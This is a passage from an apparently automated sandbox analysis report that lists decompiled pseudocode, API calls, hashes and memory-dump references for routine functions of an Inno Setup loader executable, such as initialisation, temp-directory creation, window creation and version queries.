							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t56 = _t56 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L8;
					} else {
						_t20 = E004054B4();
						_t44 = _t20;
						if(_t20 == 0) {
							goto L14;
						} else {
							goto L13;
						}
						do {
							L13:
							E00405CE8(_t44);
							_t23 = E004054B4();
							_t44 = _t23;
						} while (_t23 != 0);
						goto L14;
					}
				} else {
					do {
						_t33 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t33();
					} while ( *0x4bb054 != 0);
					L8:
					while(1) {
					}
				}
			}










                                                                    0x00407764
                                                                    0x00407766
                                                                    0x0040776b
                                                                    0x00407772
                                                                    0x00407772
                                                                    0x0040777e
                                                                    0x00407792
                                                                    0x0040779c
                                                                    0x0040779c
                                                                    0x004077a5
                                                                    0x004077c9
                                                                    0x004077cd
                                                                    0x004077d6
                                                                    0x004077d6
                                                                    0x004077dd
                                                                    0x004077fc
                                                                    0x004077fc
                                                                    0x00407805
                                                                    0x0040780c
                                                                    0x00407811
                                                                    0x00407813
                                                                    0x00407818
                                                                    0x0040781b
                                                                    0x0040781b
                                                                    0x0040781e
                                                                    0x00407821
                                                                    0x00407828
                                                                    0x00407828
                                                                    0x00407821
                                                                    0x00407811
                                                                    0x0040782f
                                                                    0x00407838
                                                                    0x0040783a
                                                                    0x0040783a
                                                                    0x00407841
                                                                    0x00407845
                                                                    0x00407845
                                                                    0x0040784d
                                                                    0x00407856
                                                                    0x00407858
                                                                    0x00407858
                                                                    0x00407861
                                                                    0x00407861
                                                                    0x00407873
                                                                    0x00407873
                                                                    0x00407875
                                                                    0x00407876
                                                                    0x00000000
                                                                    0x004077df
                                                                    0x004077df
                                                                    0x004077e4
                                                                    0x004077e8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004077ea
                                                                    0x004077ea
                                                                    0x004077ec
                                                                    0x004077f1
                                                                    0x004077f6
                                                                    0x004077f8
                                                                    0x00000000
                                                                    0x004077ea
                                                                    0x004077b0
                                                                    0x004077b0
                                                                    0x004077b0
                                                                    0x004077b9
                                                                    0x004077be
                                                                    0x004077c0
                                                                    0x00000000
                                                                    0x004077c9
                                                                    0x00000000
                                                                    0x004077c9

                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                    • String ID: MZP
                                                                    • API String ID: 3490077880-2889622443
                                                                    • Opcode ID: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                                    • Instruction ID: 4bb8ca2865ae45d0ec72c9e6ca862cba493d08d50c1d65b63798a8296780cd14
                                                                    • Opcode Fuzzy Hash: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                                    • Instruction Fuzzy Hash: 76317220E087415BE721BB7A888875B76E09B45315F14897FE541A33D2D77CB884CB6F
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407748, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E00407748() {
				intOrPtr* _t14;
				void* _t23;
				void* _t26;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t50;
				struct HINSTANCE__* _t53;
				void* _t62;

				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t50);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L9:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L15:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t18 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t18);
								_t34 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t34 + 0x10; // 0x400000
								_t53 =  *_t8;
								_t9 = _t34 + 4; // 0x400000
								if(_t53 !=  *_t9 && _t53 != 0) {
									FreeLibrary(_t53);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t62 = _t62 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L9;
					} else {
						_t23 = E004054B4();
						_t48 = _t23;
						if(_t23 == 0) {
							goto L15;
						} else {
							goto L14;
						}
						do {
							L14:
							E00405CE8(_t48);
							_t26 = E004054B4();
							_t48 = _t26;
						} while (_t26 != 0);
						goto L15;
					}
				} else {
					do {
						_t36 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t36();
					} while ( *0x4bb054 != 0);
					L9:
					while(1) {
					}
				}
			}











                                                                    0x0040774a
                                                                    0x00407764
                                                                    0x00407766
                                                                    0x0040776b
                                                                    0x00407772
                                                                    0x00407772
                                                                    0x0040777e
                                                                    0x00407792
                                                                    0x0040779c
                                                                    0x0040779c
                                                                    0x004077a5
                                                                    0x004077c9
                                                                    0x004077cd
                                                                    0x004077d6
                                                                    0x004077d6
                                                                    0x004077dd
                                                                    0x004077fc
                                                                    0x004077fc
                                                                    0x00407805
                                                                    0x0040780c
                                                                    0x00407811
                                                                    0x00407813
                                                                    0x00407818
                                                                    0x0040781b
                                                                    0x0040781b
                                                                    0x0040781e
                                                                    0x00407821
                                                                    0x00407828
                                                                    0x00407828
                                                                    0x00407821
                                                                    0x00407811
                                                                    0x0040782f
                                                                    0x00407838
                                                                    0x0040783a
                                                                    0x0040783a
                                                                    0x00407841
                                                                    0x00407845
                                                                    0x00407845
                                                                    0x0040784d
                                                                    0x00407856
                                                                    0x00407858
                                                                    0x00407858
                                                                    0x00407861
                                                                    0x00407861
                                                                    0x00407873
                                                                    0x00407873
                                                                    0x00407875
                                                                    0x00407876
                                                                    0x00000000
                                                                    0x004077df
                                                                    0x004077df
                                                                    0x004077e4
                                                                    0x004077e8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004077ea
                                                                    0x004077ea
                                                                    0x004077ec
                                                                    0x004077f1
                                                                    0x004077f6
                                                                    0x004077f8
                                                                    0x00000000
                                                                    0x004077ea
                                                                    0x004077b0
                                                                    0x004077b0
                                                                    0x004077b0
                                                                    0x004077b9
                                                                    0x004077be
                                                                    0x004077c0
                                                                    0x00000000
                                                                    0x004077c9
                                                                    0x00000000
                                                                    0x004077c9

                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                    • String ID: MZP
                                                                    • API String ID: 3490077880-2889622443
                                                                    • Opcode ID: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                                    • Instruction ID: bfc25cbdcfe625b544084418af651039c1e49876b6b13a82c314e6a817d38f33
                                                                    • Opcode Fuzzy Hash: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                                    • Instruction Fuzzy Hash: E3314D20E087419BE721BB7A888935B7BA09B05315F14897FE541A73D2D77CB884CB6F
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004B5000, Relevance: 6.0, APIs: 4, Instructions: 43threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E004B5000(void* __ecx, void* __edx) {
				intOrPtr _t19;
				intOrPtr _t22;

				_push(_t22);
				_push(0x4b50d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t22;
				 *0x4bb98c =  *0x4bb98c - 1;
				if( *0x4bb98c < 0) {
					E00405B74();
					E004051A8();
					SetThreadLocale(0x400); // executed
					E0040A250();
					 *0x4b700c = 2;
					 *0x4bb01c = 0x4036b0;
					 *0x4bb020 = 0x4036b8;
					 *0x4bb05a = 2;
					 *0x4bb060 = E0040CAA4();
					 *0x4bb008 = 0x4095a0;
					E00405BCC(E00405BB0());
					 *0x4bb068 = 0xd7b0;
					 *0x4bb344 = 0xd7b0;
					 *0x4bb620 = 0xd7b0;
					 *0x4bb050 = GetCommandLineW();
					 *0x4bb04c = E00403810();
					 *0x4bb97c = GetACP();
					 *0x4bb980 = 0x4b0;
					 *0x4bb044 = GetCurrentThreadId();
					E0040CAB8();
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x4b50de);
				return 0;
			}





                                                                    0x004b5005
                                                                    0x004b5006
                                                                    0x004b500b
                                                                    0x004b500e
                                                                    0x004b5011
                                                                    0x004b5018
                                                                    0x004b501e
                                                                    0x004b5023
                                                                    0x004b502d
                                                                    0x004b5032
                                                                    0x004b5037
                                                                    0x004b503e
                                                                    0x004b5048
                                                                    0x004b5052
                                                                    0x004b505e
                                                                    0x004b5063
                                                                    0x004b5072
                                                                    0x004b5077
                                                                    0x004b5080
                                                                    0x004b5089
                                                                    0x004b5097
                                                                    0x004b50a1
                                                                    0x004b50ab
                                                                    0x004b50b0
                                                                    0x004b50bf
                                                                    0x004b50c4
                                                                    0x004b50c4
                                                                    0x004b50cb
                                                                    0x004b50ce
                                                                    0x004b50d1
                                                                    0x004b50d6

                                                                    APIs
                                                                    • SetThreadLocale.KERNEL32(00000400,00000000,004B50D7), ref: 004B502D
                                                                      • Part of subcall function 0040A250: InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                                      • Part of subcall function 0040A250: GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                                      • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                                      • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                                      • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                                      • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                                      • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                                      • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                                      • Part of subcall function 0040CAA4: GetSystemInfo.KERNEL32 ref: 0040CAA8
                                                                    • GetCommandLineW.KERNEL32(00000400,00000000,004B50D7), ref: 004B5092
                                                                      • Part of subcall function 00403810: GetStartupInfoW.KERNEL32 ref: 00403821
                                                                    • GetACP.KERNEL32(00000400,00000000,004B50D7), ref: 004B50A6
                                                                    • GetCurrentThreadId.KERNEL32 ref: 004B50BA
                                                                      • Part of subcall function 0040CAB8: GetVersion.KERNEL32(004B50C9,00000400,00000000,004B50D7), ref: 0040CAB8
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
                                                                    • String ID:
                                                                    • API String ID: 2740004594-0
                                                                    • Opcode ID: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                                    • Instruction ID: 4c04e7183c3d5c6504f231a905193e891933426fc174ea8e71756e1f90614aff
                                                                    • Opcode Fuzzy Hash: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                                    • Instruction Fuzzy Hash: 46111CB04047449FE311BF76A8062267BA8EB05309B508A7FE110662E2EBFD15048FEE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004AEFE8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E004AEFE8(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				int _t30;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;

				_t71 = __edi;
				_t54 = __ebx;
				_t75 = _t76;
				_t55 = 4;
				do {
					_push(0);
					_push(0);
					_t55 = _t55 - 1;
				} while (_t55 != 0);
				_push(_t55);
				_push(__ebx);
				_t73 = __eax;
				_t78 = 0;
				_push(_t75);
				_push(0x4af0e1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				while(1) {
					E00422D70( &_v12, _t54, _t55, _t78); // executed
					_t55 = L".tmp";
					E004AEEC8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
					_t30 = CreateDirectoryW(E004084EC(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t54 = GetLastError();
					_t78 = _t54 - 0xb7;
					if(_t54 != 0xb7) {
						E00426F08(0x3d,  &_v32, _v8);
						_v28 = _v32;
						E00419E18( &_v36, _t54, 0);
						_v24 = _v36;
						E004232EC(_t54,  &_v40);
						_v20 = _v40;
						E00426ED8(0x81, 2,  &_v28,  &_v16);
						_t55 = _v16;
						E0041F264(_v16, 1);
						E0040711C();
					}
				}
				E00407E00(_t73, _v8);
				__eflags = 0;
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E004AF0E8);
				E00407A80( &_v40, 3);
				return E00407A80( &_v16, 3);
			}


















                                                                    0x004aefe8
                                                                    0x004aefe8
                                                                    0x004aefe9
                                                                    0x004aefeb
                                                                    0x004aeff0
                                                                    0x004aeff0
                                                                    0x004aeff2
                                                                    0x004aeff4
                                                                    0x004aeff4
                                                                    0x004aeff7
                                                                    0x004aeff8
                                                                    0x004aeffa
                                                                    0x004aeffc
                                                                    0x004aeffe
                                                                    0x004aefff
                                                                    0x004af004
                                                                    0x004af007
                                                                    0x004af00a
                                                                    0x004af011
                                                                    0x004af019
                                                                    0x004af020
                                                                    0x004af030
                                                                    0x004af037
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af03e
                                                                    0x004af040
                                                                    0x004af046
                                                                    0x004af056
                                                                    0x004af05e
                                                                    0x004af06a
                                                                    0x004af072
                                                                    0x004af07a
                                                                    0x004af082
                                                                    0x004af091
                                                                    0x004af096
                                                                    0x004af0a0
                                                                    0x004af0a5
                                                                    0x004af0a5
                                                                    0x004af046
                                                                    0x004af0b4
                                                                    0x004af0b9
                                                                    0x004af0bb
                                                                    0x004af0be
                                                                    0x004af0c1
                                                                    0x004af0ce
                                                                    0x004af0e0

                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF030
                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF039
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast
                                                                    • String ID: .tmp
                                                                    • API String ID: 1375471231-2986845003
                                                                    • Opcode ID: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                                    • Instruction ID: 89b964d67460c442e7c67535b057b8112791baa86db9a38931a927ffd746d2a8
                                                                    • Opcode Fuzzy Hash: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                                    • Instruction Fuzzy Hash: 3A218735A041089BDB00EBE1C842ADFB3B9EB49304F50447BF800F7381DA386E058BA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040E450(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				WCHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				WCHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00405740();
				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00405730(_t13);
				return _t24;
			}








                                                                    0x0040e457
                                                                    0x0040e45c
                                                                    0x0040e45e
                                                                    0x0040e48f
                                                                    0x0040e498
                                                                    0x0040e4a4

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID: InnoSetupLdrWindow$STATIC
                                                                    • API String ID: 716092398-2209255943
                                                                    • Opcode ID: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                                    • Instruction ID: 770f17d29583ffea265d4876c6cd55b491c436ce5e2cc0b006eebdc9bc405b2a
                                                                    • Opcode Fuzzy Hash: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                                    • Instruction Fuzzy Hash: 73F07FB6600118AF9B84DE9EDC85E9B77ECEB4D264B05412ABA08E7201D634ED118BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004AF1B4, Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004AF1B4(long __eax, intOrPtr __edx, long _a4, long _a8) {
				intOrPtr _v8;
				long _t5;
				long _t9;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t5 = __eax;
				_v8 = __edx;
				_t9 = __eax;
				_t15 = _t10 - 1;
				if(_t15 < 0) {
					L10:
					return _t5;
				}
				_t16 = _t15 + 1;
				_t13 = 0;
				while(1) {
					_t19 = _t13 - 1;
					if(_t13 != 1) {
						__eflags = _t13 - 1;
						if(__eflags > 0) {
							Sleep(_a4);
						}
					} else {
						Sleep(_a8);
					}
					_t5 = E00427154(_t9, _v8, _t19); // executed
					if(_t5 != 0) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 2) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 3) {
						goto L10;
					}
					_t13 = _t13 + 1;
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L10;
				}
				goto L10;
			}










                                                                    0x004af1b4
                                                                    0x004af1bb
                                                                    0x004af1be
                                                                    0x004af1c2
                                                                    0x004af1c5
                                                                    0x004af213
                                                                    0x004af213
                                                                    0x004af213
                                                                    0x004af1c7
                                                                    0x004af1c8
                                                                    0x004af1ca
                                                                    0x004af1ca
                                                                    0x004af1cd
                                                                    0x004af1da
                                                                    0x004af1dd
                                                                    0x004af1e3
                                                                    0x004af1e3
                                                                    0x004af1cf
                                                                    0x004af1d3
                                                                    0x004af1d3
                                                                    0x004af1ed
                                                                    0x004af1f4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af1f6
                                                                    0x004af1fe
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af200
                                                                    0x004af208
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af20a
                                                                    0x004af20b
                                                                    0x004af20c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af20c
                                                                    0x00000000

                                                                    APIs
                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1E3
                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLastSleep
                                                                    • String ID:
                                                                    • API String ID: 1458359878-0
                                                                    • Opcode ID: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                                    • Instruction ID: c6a2870ed3ca6a3ef6dac7de38143878fdab2d33d6efdb0808b7300bb595a527
                                                                    • Opcode Fuzzy Hash: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                                    • Instruction Fuzzy Hash: 0CF02B37B04224A76724A5EBEC46D6FE298DEB33A8710457BFC04D7302C439CC4542A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041FF94, Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E0041FF94(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
				char _v8;
				char _v9;
				int _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _t33;
				int _t43;
				int _t64;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int* _t77;
				signed int* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffe8;
				_v8 = 0;
				_t77 = __ecx;
				_t79 = __edx;
				_push(_t81);
				_push(0x420094);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_v9 = 0;
				E00407E48( &_v8, __eax);
				E00407FB0( &_v8);
				_t33 = GetFileVersionInfoSizeW(E004084EC(_v8),  &_v16); // executed
				_t64 = _t33;
				if(_t64 == 0) {
					_pop(_t72);
					 *[fs:eax] = _t72;
					_push(0x42009b);
					return E00407A20( &_v8);
				} else {
					_v20 = E004053F0(_t64);
					_push(_t81);
					_push(0x420077);
					_push( *[fs:edx]);
					 *[fs:edx] = _t83;
					_t43 = GetFileVersionInfoW(E004084EC(_v8), _v16, _t64, _v20); // executed
					if(_t43 != 0 && VerQueryValueW(_v20, 0x4200a8,  &_v24,  &_v28) != 0) {
						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
						_v9 = 1;
					}
					_pop(_t74);
					 *[fs:eax] = _t74;
					_push(0x42007e);
					return E0040540C(_v20);
				}
			}



















                                                                    0x0041ff95
                                                                    0x0041ff97
                                                                    0x0041ff9f
                                                                    0x0041ffa2
                                                                    0x0041ffa4
                                                                    0x0041ffaa
                                                                    0x0041ffab
                                                                    0x0041ffb0
                                                                    0x0041ffb3
                                                                    0x0041ffb6
                                                                    0x0041ffbf
                                                                    0x0041ffc7
                                                                    0x0041ffd9
                                                                    0x0041ffde
